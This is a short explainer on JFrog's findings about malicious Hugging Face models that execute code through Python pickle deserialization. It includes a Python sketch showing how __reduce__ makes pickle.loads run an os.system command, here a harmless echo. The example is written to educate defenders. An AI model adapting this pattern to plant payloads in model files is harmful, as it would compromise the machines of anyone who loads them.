Hugging Face, a prominent platform for AI model collaboration, faces potential security threats from malicious machine learning models that can lead to code-execution attacks, a risk highlighted by recent findings from the JFrog Security Research team. One discovered model carried a payload that opened a reverse shell to an attacker-controlled host, granting unauthorized access to the machine that loaded it and potentially enabling data breaches or corporate espionage. The research emphasizes the vulnerabilities of certain model formats, particularly the "pickle" serialization format, which can execute arbitrary code the moment a model is loaded. Hugging Face has implemented security measures such as malware and pickle scanning to mitigate these threats, although flagged models can still be downloaded and continue to pose risks. The JFrog team has developed a scanning environment to detect and neutralize such threats, and advocates continuous vigilance and stronger security frameworks across AI ecosystems. These incidents underscore the importance of safeguarding the AI supply chain and highlight the role of initiatives like Huntr in hardening AI models and platforms.
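To illustrate the mechanism behind pickle-based attacks, the sketch below shows how Python's `pickle` protocol lets an object's `__reduce__` method schedule an arbitrary function call that runs during deserialization. The `MaliciousPayload` class and the harmless `echo` command are illustrative stand-ins; a real payload of the kind JFrog describes would instead launch something like a reverse shell.

```python
import os
import pickle

# pickle's __reduce__ hook lets an object specify a callable and
# arguments to reconstruct itself. An attacker can abuse this to
# make deserialization call os.system with any command they choose.
class MaliciousPayload:
    def __reduce__(self):
        # Illustrative stand-in for a real payload (e.g., a reverse shell).
        return (os.system, ("echo 'arbitrary code ran on load'",))

# The "model author" serializes the booby-trapped object...
blob = pickle.dumps(MaliciousPayload())

# ...and the victim triggers execution simply by loading it.
# PyTorch's default .bin/.pt checkpoint format wraps pickle, so
# torch.load() on an untrusted file hits this same code path.
pickle.loads(blob)
```

This load-time execution is why Hugging Face's pickle scanning flags suspicious imports inside serialized models, and why formats such as safetensors, which store raw tensor data with no embedded code, are increasingly recommended for distributing model weights.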